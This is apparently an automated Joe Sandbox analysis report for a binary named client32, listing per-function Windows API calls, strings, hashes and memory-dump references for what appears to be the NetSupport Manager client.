                                                                                                                                                                                                    • Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                                                                                    • Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetParent.USER32(00008000), ref: 11077853
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,?), ref: 11077877
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110778B9
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,00000000), ref: 1107785C
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110778E8
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$ExitProcess$DestroyErrorLastLoadLongMessageParentWindowwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$hMenu$hSub$idata->pButtonInfo
                                                                                                                                                                                                    • API String ID: 1870487012-2787262744
                                                                                                                                                                                                    • Opcode ID: d41c14fc3328b578093b9e44408b228e8c9d107bdc84aaeded344c3fd6abc706
                                                                                                                                                                                                    • Instruction ID: 86ae3540cb0496ed21d998be513a7f9f4c12925ae125bce2099eeeadfbe95508
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d41c14fc3328b578093b9e44408b228e8c9d107bdc84aaeded344c3fd6abc706
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C31D1B5B00626AFD310DB59DCC4E6AF3A8EB84758F104164FA15A7781EB71EC11C7E2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: LocalAlloc.KERNEL32(00000040,00000014,?,1100D58F,?), ref: 110EBBF0
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D58F,?), ref: 110EBC02
                                                                                                                                                                                                      • Part of subcall function 110EBBE0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D58F,?), ref: 110EBC14
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D5A7
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5C0
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1100D5DF
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1100D600
                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D649
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000), ref: 1100D661
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1100D66A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleNamewsprintf
                                                                                                                                                                                                    • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                                                                                    • API String ID: 3414582223-4146734959
                                                                                                                                                                                                    • Opcode ID: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
                                                                                                                                                                                                    • Instruction ID: a456dda971beae3ede1202bfd149c5043837a25f7bf8d7d11396327520b54e87
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE218675E41329ABEB60DBE4CC89FDEB77C9B04708F108195F719A71C0DAB0AA448F65
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B73C
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B751
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B764
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B771
                                                                                                                                                                                                      • Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B796
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • GdiFlush.GDI32(?,?,?,023A8E08), ref: 1111D4D0
                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1111D50D
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1111D51A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,023A8E08), ref: 1111D524
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1111D54B
                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 1111D55E
                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 1111D56B
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(111E59C8), ref: 1111D578
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error deleting membm, e=%d, xrefs: 1111D52B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Delete$Object$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                                                                                                                    • String ID: Error deleting membm, e=%d
                                                                                                                                                                                                    • API String ID: 4021610862-709490903
                                                                                                                                                                                                    • Opcode ID: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
                                                                                                                                                                                                    • Instruction ID: 8035f785c448485e0a0b583a16257735e59db1fe9725df5791180d2e2a6c23f4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2147B5500B029BD2919F75D8D8AAFF7F4EF89308F10491DE6AA87204DB34B541CF62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • SetPropA.USER32(?,?,00000000), ref: 1113B33E
                                                                                                                                                                                                    • GetPropA.USER32(?), ref: 1113B34D
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1113B37F
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1113B3B1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$wsprintf$Remove
                                                                                                                                                                                                    • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                                                    • API String ID: 2737406398-1590351400
                                                                                                                                                                                                    • Opcode ID: 01c1f07ef8b6b209979e896109e748aae703513a6db7c0a7f24b0c6da771398e
                                                                                                                                                                                                    • Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01c1f07ef8b6b209979e896109e748aae703513a6db7c0a7f24b0c6da771398e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11057136
                                                                                                                                                                                                      • Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                                                                                                      • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11057293
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$CountTick$LibraryLoad
                                                                                                                                                                                                    • String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
                                                                                                                                                                                                    • API String ID: 2027352829-2337161965
                                                                                                                                                                                                    • Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                                                                                                    • Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B), ref: 110890D2
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110890F2
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110891CC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                                                                                                    • String ID: ..\ctl32\EVMNGR.cpp$bFound
                                                                                                                                                                                                    • API String ID: 2351996187-1425459369
                                                                                                                                                                                                    • Opcode ID: 6fdbd68c3c27f10dc3acf3685911079d36d957e2866ff6e55e5f076c332c9d36
                                                                                                                                                                                                    • Instruction ID: 93f90889458edbc4556596d890223acb70056fa3e67425ba47832c416fc48267
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fdbd68c3c27f10dc3acf3685911079d36d957e2866ff6e55e5f076c332c9d36
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D517A75E0C2459FDF06DF68C888F9ABBE5EB89314F14859DE816DB281E730E940CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110F2C0: GetClientRect.USER32(?,?), ref: 1110F2EA
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11115761
                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1111577A
                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 11115788
                                                                                                                                                                                                    • GetScrollRange.USER32(?,00000000,?,?), ref: 111157C9
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000003), ref: 111157D9
                                                                                                                                                                                                    • GetScrollRange.USER32(?,00000001,?,00000000), ref: 111157EC
                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 111157F6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 1111583C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                                                                                                                                    • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                                                                                                                                    • API String ID: 4172599486-2052393828
                                                                                                                                                                                                    • Opcode ID: 3fb9398d884e0b1f03dd4fb152e9d316f2021fb16bc8a688f9a69a5ffb4c59fd
                                                                                                                                                                                                    • Instruction ID: 3e241e9a407663bc388a2dd64db1b086e46b56b899d91e46caf7545b16d0e57c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fb9398d884e0b1f03dd4fb152e9d316f2021fb16bc8a688f9a69a5ffb4c59fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851087590060AAFDB14CFA9C980BEEFBF9FF88314F148529E916A7244D734A941CF60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • #16.WSOCK32(?,?,?,00000000), ref: 689C78F6
